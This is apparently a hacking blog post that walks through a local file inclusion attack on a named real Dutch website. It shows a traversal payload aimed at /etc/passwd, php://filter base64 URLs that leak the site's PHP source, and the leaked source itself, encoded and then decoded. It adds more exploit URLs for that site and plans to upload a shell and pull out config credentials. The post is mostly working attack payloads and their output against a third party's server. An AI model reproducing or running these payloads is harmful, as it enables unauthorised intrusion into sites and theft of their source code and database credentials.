Read PHP files using LFI (Base 64 Bypass)

Hello,

Ever thought you can read the PHP Files using Local File Inclusion. ? Let me explain, i will show how do i bypassed the LFI Restrictions. In this tutorial i am going to give you a url to show you how this works and how to bypass openbase dir restriction etc. It doesn’t work always, but if you do perfect encoding then it will work.

Example of base 64 encode file out
(php://filter/convert.base64-encode/resource=index.php&top=Home)
Let me show you a POC :
Target URL
——————————————-
http://mistflard.nl/index.php?page=home.php (200)ok
URL THAT TRIGGERED ERROR
——————————
http://mistflard.nl/index.php?page=../../../../../../../../etc/passwd
ERROR
———-

Warning: include() [function.include]: open_basedir restriction ineffect. File(/etc/passwd) is not within the allowed path(s):
(/home/jthkrgfw/:/tmp:/var/tmp:/usr/local/lib/php/) in
/home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129
Warning: include(/etc/passwd) [function.include]: failed to open stream:
Operation not permitted in/home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129
Warning: include() [function.include]: open_basedir restriction in
effect. File(/etc/passwd) is not within the allowed path(s):
(/home/jthkrgfw/:/tmp:/var/tmp:/usr/local/lib/php/) in/home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129

Now, lets see what we can do here.
1) http://mistflard.nl/index.php?page=php://filter/convert.base64-encode/resource=index.php
2) Base 64 Encoded Response
ss_shikari_1
——————————————————
PD9waHAgCnJlcXVpcmUgInByZXBlbmQucGhwIjsgCiRsb2dpbj0kX0dFVFsnbG9naW4nXTsKPz4KPCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlvbmFsLy9FTiIgImh0dHA6Ly93d3cudzMub3JnL1RSL3hodG1sMS9EVEQveGh0bWwxLXRyYW5zaXRpb25hbC5kdGQiPgo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+CjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4KPG1ldGEgIG5hbWUgPSAidmlld3BvcnQiIGNvbnRlbnQgPSAid2lkdGg9MTAyNCIgLz4KPGxpbmsgaHJlZj0ic3RpamwuY3NzIiByZWw9InN0eWxlc2hlZXQiIHR5cGU9InRleHQvY3NzIiAvPgo8IS0tW2lmIElFIDZdPiA8bGluayBocmVmPSJzdGlqbDEuY3NzIiByZWw9InN0eWxlc2hlZXQiIHR5cGU9InRleHQvY3NzIj48IVtlbmRpZl0tLT4KPGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVmPSIvZmF2aWNvbi5pY28iIC8+Cjx0aXRsZT5taXN0ZmxhcmQ8L3RpdGxlPgo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCIgc3JjPSJtZDUuanMiPjwvc2NyaXB0Pgo8c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0Ij4KZnVuY3Rpb24gcGFzc1Jlc3BvbnNlKCkgewp2YXIgdXNlcl9lbGVtZW50ID0gZG9jdW1lbnQubG9naW4udXNlcl90ZW1wLnZhbHVlOyAvLyBkb2N1bWVudC5oZm9ybS51c2VyLnZhbHVlIAogIC8vZG9jdW1lbnQuaGZvcm0ucGFzcy52YWx1ZQpwYXNzPXVzZXJfZWxlbWVudCtkb2N1bWVudC5sb2dpbi5wYXNzX3RlbXAudmFsdWU7CmRvY3VtZW50LmxvZ2luLnBhc3NfdGVtcC52YWx1ZSA9ICIiOwp3YWNodDE9TUQ1KHBhc3MpLnRvTG93ZXJDYXNlKCk7CnBhc3M9IiI7Cjw/cGhwICRwYXJhPW1pY3JvdGltZSgxKSoxMDAwOyA/PgpidWZmPXdhY2h0MSs8P3BocCBlY2hvICRwYXJhOyA/PjsgCndhY2h0Mj1NRDUoYnVmZikudG9Mb3dlckNhc2UoKTsKZG9jdW1lbnQuaGZvcm0udXNlci52YWx1ZT11c2VyX2VsZW1lbnQ7CmRvY3VtZW50Lmhmb3JtLnBhc3N3b3JkLnZhbHVlPXdhY2h0MjsKZG9jdW1lbnQuaGZvcm0uY29kZS52YWx1ZT08P3BocCBlY2hvICRwYXJhOyA/PjsKZG9jdW1lbnQuaGZvcm0uc3VibWl0KCk7Cn0KPC9zY3JpcHQ+CjwvaGVhZD4KPGJvZHk+CjxkaXYgaWQ9Ik1haW4iPgo8ZGl2IGlkPSJIb29mZCI+CjxkaXYgaWQ9ImxvZ2luIj4KPD9waHAKaWYgKCRfU0VTU0lPTlsndXNlciddPT1udWxsKQp7CmlmICgkbG9naW49PTEpIGVjaG8gIjxhIGhyZWY9J2luZGV4LnBocD9wYWdlPWhvbWUucGhwJmxvZ2luPTAnIHRpdGxlPSdnYSB0ZXJ1Zyc+PGltZyBzcmM9J2ltYWdlcy9rbm9weS5naWYnIGFsdD0ndWl0JyBzdHlsZT0nYm9yZGVyOjAnLz48L2E+IjsgZWxzZSBlY2hvICI8YSBocmVmPSdpbmRleC5waHA/cGFnZT1pbmxlaWRpbmdhZG1pbi5waHAmbG9naW49MScgPjxpbWcgc3JjPSdpbWFnZXMva25vcHguZ2lmJyBhbHQ9J2Fhbicgc3R5bGU9J2JvcmRlcjowJy8+PC9hPiI7CmlmICgkbG9naW4hPTEpCnsKaW5jbHVkZSAiY29udHJvbGUucGhwIjsKZWNobyAiPHRhYmxlPjx0cj4iOwplY2hvICI8dGQ+Z2VicnVpa2Vyc25hYW06PC90ZD48dGQ+d2FjaHR3b29yZDo8L3RkPjwvdHI+IjsKZWNobyAiPHRyPjxmb3JtIGFjdGlvbj0nbG9naW4ucGhwJyBtZXRob2Q9J3Bvc3QnPiI7CmVjaG8gIjx0ZD48aW5wdXQgdHlwZT0ndGV4dCcgbmFtZT0ndXNlcm5hbWUnIHZhbHVlPScnIHN0eWxlPSd3aWR0aDo4N3B4O2hlaWdodDoxMnB4O2ZvbnQtc2l6ZToxMXB4Jy8+PC90ZD4iOwplY2hvICI8dGQ+PGlucHV0IHR5cGU9J3Bhc3N3b3JkJyBuYW1lPSdwYXNzd29yZCcgdmFsdWU9Jycgc3R5bGU9J3dpZHRoOjg3cHg7aGVpZ2h0OjEycHg7Zm9udC1zaXplOjExcHgnIC8+PC90ZD4iOwplY2hvICI8dGQ+PGlucHV0IHR5cGU9J2hpZGRlbicgbmFtZT0nY29kZScgdmFsdWU9JHBhcmEgPjwvdGQ+IjsKZWNobyAiPHRkPjxpbnB1dCB0eXBlPSdzdWJtaXQnIG5hbWU9J3N1Ym1pdEJ1dHRvbicgdmFsdWU9J2xvZ2luJyBjbGFzcz0na25vcDEnLz48L3RkPiI7CmVjaG8gIjwvZm9ybT4gIjsKfSBlbHNlCnsKZWNobyAnPGZvcm0gbmFtZT0ibG9naW4iPic7CmVjaG8gJzx0YWJsZT48dHI+PHRkPmdlYnJ1aWtlcnNuYWFtOjwvdGQ+PHRkPndhY2h0d29vcmQ6PC90ZD48L3RyPic7CmVjaG8gIjx0ZD48aW5wdXQgdHlwZT0ndGV4dCcgbmFtZT0ndXNlcl90ZW1wJyB2YWx1ZT0nJyBzdHlsZT0nd2lkdGg6ODdweDtoZWlnaHQ6MTJweDtmb250LXNpemU6MTFweCcgLz48L3RkPiI7CmVjaG8gIjx0ZD48aW5wdXQgdHlwZT0ncGFzc3dvcmQnIG5hbWU9J3Bhc3NfdGVtcCcgdmFsdWU9Jycgc3R5bGU9J3dpZHRoOjg3cHg7aGVpZ2h0OjEycHg7Zm9udC1zaXplOjExcHgnIC8+PC90ZD4iOwplY2hvICc8dGQ+PGlucHV0IG9uQ2xpY2s9InBhc3NSZXNwb25zZSgpOyByZXR1cm4gZmFsc2U7IiB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdGJ0biIgdmFsdWU9IkxvZ2luIHZlaWxpZyIgIGNsYXNzPSJrbm9wMiI+PC90ZD4nOwplY2hvICc8L2Zvcm0+JzsKZWNobyAnPGZvcm0gYWN0aW9uPSJsb2dpbnZlaWxpZy5waHAiIE1FVEhPRD0iUE9TVCIgbmFtZT0iaGZvcm0iPic7CmVjaG8gJzxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InVzZXIiPic7CmVjaG8gJzxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InBhc3N3b3JkIj4nOwplY2hvICc8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJjb2RlIj4nOwplY2hvICc8L2Zvcm0+JzsKfQp9IGVsc2UKewplY2hvICI8aW1nIHNyYz0naW1hZ2VzL2tub3B6LmdpZicgYWx0PScnIHN0eWxlPSdib3JkZXI6MCcvPjwvYT4iOwokdXNlcj0kX1NFU1NJT05bJ3VzZXInXTsKZWNobyAiPHRhYmxlPjx0cj48dGQgc3R5bGU9J3dpZHRoOjIyMHB4Jz4kdXNlciBpcyBpbmdlbG9nZC48L3RkPjwvdHI+IjsKZWNobyAiPHRyPjx0ZD48Zm9ybSBhY3Rpb249J2xvZ3VpdC5waHAnIG1ldGhvZD0ncG9zdCc+PGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0nc3ViMmEnIHZhbHVlPSdsb2d1aXQnIGNsYXNzPSdrbm9wMScgdGl0bGU9J3VpdGxvZ2dlbicvPiI7CmVjaG8gIjwvZm9ybT48L3RkPiI7ICAgLy8oPGEgaHJlZj0ibG9ndWl0LnBocCI+TG9ndWl0PC9hPikKIAp9CmlmICgoJF9TRVNTSU9OWyd1c2VyJ109PW51bGwpICYmICgkbG9naW4hPTEpKQp7CmVjaG8gIjxmb3JtIGFjdGlvbj0naW5kZXgucGhwP3BhZ2U9cGhwL2ZvcnVtL21lbGRhYW4ucGhwJyBtZXRob2Q9J3Bvc3QnPiI7CmVjaG8gIjx0ZD48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSdzdWJtaXRCdXR0b24nIHZhbHVlPSdpbnNjaHJpanZlbicgY2xhc3M9J2tub3AyJy8+IjsKZWNobyAiPC90ZD48L2Zvcm0+IjsKZWNobyAiPGZvcm0gYWN0aW9uPSdpbmRleC5waHA/cGFnZT1waHAvZm9ydW0vdmVyZ2V0ZW4ucGhwJyBtZXRob2Q9J3Bvc3QnPiI7CmVjaG8gIjx0ZD48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSdzdWIyJyB2YWx1ZT0nPycgY2xhc3M9J2tub3AwJyB0aXRsZT0nd2FjaHR3b29yZCB2ZXJnZXRlbj8nLz4iOwplY2hvICI8L3RkPjwvZm9ybT4iOwp9IGVsc2UgaWYgKCRsb2dpbiE9MSkKewplY2hvICI8Zm9ybSBhY3Rpb249J2luZGV4LnBocD9wYWdlPXBocC9mb3J1bS9zY2hyaWpmdWl0LnBocCcgbWV0aG9kPSdwb3N0Jz4iOyBlY2hvIjx0ZCBzdHlsZT0nd2lkdGg6MTI4cHgnPjwvdGQ+IjsKZWNobyAiPHRkPjxpbnB1dCB0eXBlPSdzdWJtaXQnIG5hbWU9J3N1Ym1pdEJ1dHRvbicgdmFsdWU9J3VpdHNjaHJpanZlbicgY2xhc3M9J2tub3AyJy8+IjsKZWNobyAiPGlucHV0IHR5cGU9J2hpZGRlbicgbmFtZT0ndXNlcm5hYW0nIHZhbHVlPVwiJHVzZXJcIj4iOwplY2hvICI8L3RkPjwvZm9ybT4iOwogaWYgKCR1c2VyPT0nYWRtaW4nKQogewogZWNobyAiPGZvcm0gYWN0aW9uPSdpbmRleC5waHA/cGFnZT1waHAvZm9ydW0vaW5zdGVsbGluZ2VuLnBocCcgbWV0aG9kPSdwb3N0Jz4iOwogZWNobyAiPHRkPjxpbnB1dCB0eXBlPSdzdWJtaXQnIG5hbWU9J3N1YnN0ZWxpbicgdmFsdWU9J0luLicgY2xhc3M9J2tub3AwJyB0aXRsZT0nSW5zdGVsbGluZ2VuJy8+IjsKIGVjaG8gIjwvdGQ+PC9mb3JtPiI7CiB9CiAKfSBlY2hvICI8L3RyPjwvdGFibGU+PC9kaXY+IjsgLy8gZWluZGUgbG9naW4KJHZvcm0xPScnOyR2b3JtMj0nJzskdm9ybTM9Jyc7JHZvcm00PScnOyR2b3JtNT0nJzskdm9ybTY9Jyc7CmlmIChpc3NldCgkX0dFVFsncGFnZSddKSkKICAgICRwYWdlID0gJF9HRVRbJ3BhZ2UnXTsKZWxzZSAkcGFnZSA9ICJpbmxlaWRpbmcucGhwIjsgCmlmICgkcGFnZT09ImlubGVpZGluZy5waHAiKSAgIHskdm9ybTE9J2Jsb2snO30gZWxzZQppZiAoJHBhZ2U9PSJpbmxlaWRpbmdhZG1pbi5waHAiKXskdm9ybTE9J2Jsb2snO30gZWxzZQppZiAoJHBhZ2U9PSJob21lLnBocCIpICAgICAgICB7JHZvcm0yPSdibG9rJzt9IGVsc2UKaWYgKCRwYWdlPT0idG9lbGljaHRpbmcucGhwIikgeyR2b3JtMz0nYmxvayc7fSBlbHNlCmlmICgkcGFnZT09ImZvcnVtcmVnZWxzLnBocCIpIHskdm9ybTQ9J2Jsb2snO30gZWxzZQppZiAoKCRwYWdlPT0iY29udGFjdC5waHAiKSB8fCAoJHBhZ2U9PSJlZm9ybS5waHAiKSB8fCAoJHBhZ2U9PSJtYWlsLnBocCIpICkgeyR2b3JtNT0nYmxvayc7fSBlbHNlIHskdm9ybTI9J2Jsb2snOyB9Cj8+CjwvZGl2PiA8IS0tZWluZGUgSG9vZmQtLT4KPGRpdiBjbGFzcz0ibWVudSI+CiA8ZGl2IGNsYXNzPSJob3Zlcm1lbnUiPgogPHVsPgogPGxpIGlkPSI8P3BocCBlY2hvICR2b3JtMTsgPz4iPjxhIGhyZWY9ImluZGV4LnBocD9wYWdlPWlubGVpZGluZy5waHAiIHRpdGxlPSJJbmxlaWRpbmciPjxzcGFuPklubGVpZGluZzwvc3Bhbj48L2E+PC9saT4KIDxsaSBpZD0iPD9waHAgZWNobyAkdm9ybTI7ID8+Ij48YSBocmVmPSJpbmRleC5waHA/cGFnZT1ob21lLnBocCIgdGl0bGU9IkZvcnVtIj48c3Bhbj5Gb3J1bTwvc3Bhbj48L2E+PC9saT4KIDxsaSBpZD0iPD9waHAgZWNobyAkdm9ybTM7ID8+Ij48YSBocmVmPSJpbmRleC5waHA/cGFnZT10b2VsaWNodGluZy5waHAiIHRpdGxlPSIiPjxzcGFuPlRvZWxpY2h0aW5nPC9zcGFuPjwvYT48L2xpPgogPGxpIGlkPSI8P3BocCBlY2hvICR2b3JtNDsgPz4iPjxhIGhyZWY9ImluZGV4LnBocD9wYWdlPWZvcnVtcmVnZWxzLnBocCIgdGl0bGU9IiI+PHNwYW4+Rm9ydW0gcmVnZWxzPC9zcGFuPjwvYT48L2xpPgogPGxpIGlkPSI8P3BocCBlY2hvICR2b3JtNTsgPz4iPjxhIGhyZWY9ImluZGV4LnBocD9wYWdlPWNvbnRhY3QucGhwIiB0aXRsZT0iIj48c3Bhbj5Db250YWN0PC9zcGFuPjwvYT48L2xpPgogPC91bD4KPC9kaXY+CjwvZGl2Pgo8ZGl2IGNsYXNzPSJiYWxrIj48IS0tIHZvb3IgSUUgNiAtLT48L2Rpdj4KPD9waHAKaWYgKGlzc2V0KCRfR0VUWydwYWdlJ10pKQogICAgJHBhZ2UgPSAkX0dFVFsncGFnZSddOwplbHNlICRwYWdlID0gImlubGVpZGluZy5waHAiOyAKPz4KPD9waHAKZWNobyI8ZGl2IGlkPSdDb250ZW50Jz4iOwppZiAoKCRwYWdlPT0iaW5sZWlkaW5nYWRtaW4ucGhwIikgJiYgKCRfU0VTU0lPTlsndXNlciddIT1udWxsKSkgJHBhZ2U9ImlubGVpZGluZy5waHAiOwppbmNsdWRlICRwYWdlOyAKZWNobyAiPC9kaXY+IjsgLyplaW5kZSBjb250ZW50ICovCj8+CjxkaXYgaWQ9IlZvZXQiPgo8P3BocApzZXRsb2NhbGUoTENfVElNRSwnbmxfTkwnLCdubCcsJ2R1Jyk7CmVjaG8gIjxkaXYgc3R5bGU9J21hcmdpbi1sZWZ0OjYwMHB4O21hcmdpbi10b3A6MTBweDsnPiIuJ1BhZ2luYSBnZW9wZW5kOiAnLCBzdHJmdGltZSgiJUg6JU06JVMgJUEgJWQgJUIgJVkiLCBta3RpbWUoKSksJzwvZGl2Pic7Cj8+CjwvZGl2Pgo8L2Rpdj4gPCEtLWVpbmRlIG1haW4tLT4KCjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4KdmFyIGdhSnNIb3N0ID0gKCgiaHR0cHM6IiA9PSBkb2N1bWVudC5sb2NhdGlvbi5wcm90b2NvbCkgPyAiaHR0cHM6Ly9zc2wuIiA6ICJodHRwOi8vd3d3LiIpOwpkb2N1bWVudC53cml0ZSh1bmVzY2FwZSgiJTNDc2NyaXB0IHNyYz0nIiArIGdhSnNIb3N0ICsgImdvb2dsZS1hbmFseXRpY3MuY29tL2dhLmpzJyB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnJTNFJTNDL3NjcmlwdCUzRSIpKTsKPC9zY3JpcHQ+CjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4KdHJ5ewp2YXIgcGFnZVRyYWNrZXIgPSBfZ2F0Ll9nZXRUcmFja2VyKCJVQS0xNzUwODA1Ny0xIik7CnBhZ2VUcmFja2VyLl90cmFja1BhZ2V2aWV3KCk7Cn0gY2F0Y2goZXJyKSB7fQo8L3NjcmlwdD4KCjwvYm9keT4KPC9odG1sPg==
—————————————————————————————————
3) DECODED RESPONSE
—————————————————————————————————
ss_shikari_2

function passResponse() {
var user_element = document.login.user_temp.value; // document.hform.user.value
//document.hform.pass.value
pass=user_element+document.login.pass_temp.value;
document.login.pass_temp.value = "";
wacht1=MD5(pass).toLowerCase();
pass="";

buff=wacht1+;
wacht2=MD5(buff).toLowerCase();
document.hform.user.value=user_element;
document.hform.password.value=wacht2;
document.hform.code.value=;
document.hform.submit();
}

controle.php";

echo "
"; echo "";
echo "
"; echo "";
echo " ";
echo " ";
echo " ";
echo " ";
} else
{
echo '';
echo '
';
echo " ";
echo " ";
echo ' ';
echo '';
echo '';
echo '';
echo '';
echo '';
echo '';
}
} else
{
echo "";
$user=$_SESSION['user'];
echo "
";
echo "
";   //(Loguit)}
if (($_SESSION['user']==null) && ($login!=1))
{
echo "";
echo "";
echo "";
echo "";
echo "";
echo "";
} else if ($login!=1)
{
echo ""; echo"
";
echo "";
echo "";
echo "";
if ($user=='admin')
{

$vorm1='';$vorm2='';$vorm3='';$vorm4='';$vorm5='';$vorm6='';
if (isset($_GET['page']))
$page = $_GET['page'];
else $page = "inleiding.php";
if ($page=="inleiding.php")   {$vorm1='blok';} else
if ($page=="inleidingadmin.php"){$vorm1='blok';} else
if ($page=="home.php")        {$vorm2='blok';} else
if ($page=="toelichting.php") {$vorm3='blok';} else
if ($page=="forumregels.php") {$vorm4='blok';} else
if (($page=="contact.php") || ($page=="eform.php") || ($page=="mail.php") ) {$vorm5='blok';} else {$vorm2='blok'; }
?>
echo"

";
if (($page=="inleidingadmin.php") && ($_SESSION['user']!=null)) $page="inleiding.php";
include $page;
echo "
"; /*einde content */
?>

".'Pagina geopend: ', strftime("%H:%M:%S %A %d %B %Y", mktime()),'
';
?>
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));

try{
var pageTracker = _gat._getTracker("UA-17508057-1");
pageTracker._trackPageview();
} catch(err) {}

4.)Now we move on to see if we can root the box or atleast get a shell uploaded now they have open base dir restriction in effect so i highly doubt we can upload a shell via proc/self/environ but we can try it.
5.) So i grab prepend.php and decode its contents as well,using opionated geeks base 64 decoder online and got the following
aaditya3
Response after decode
aaditya4
Writing other response would be too long for the blog. So you can get Base 64 encoded of any PHP page of the website
http://mistflard.nl/index.php?page=php://filter/convert.base64-encode/resource=php/login/versio.inc.php
http://mistflard.nl/index.php?page=php://filter/convert.base64-encode/resource=php/forum/vergeten.php
http://mistflard.nl/index.php?page=php://filter/convert.base64-encode/resource=php/forum/meldaan.php
6.)Now if you can read any of the files, then lets try on config. That wasn’t easy but you can also extract the configuration.php /config.php file too.
———————————
login info
———————————-

and to top it off they block access from outside to the mysql server so what are we to do. So this is how i bypass LFI where direct query is blocked.
Thank you. 🙂

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s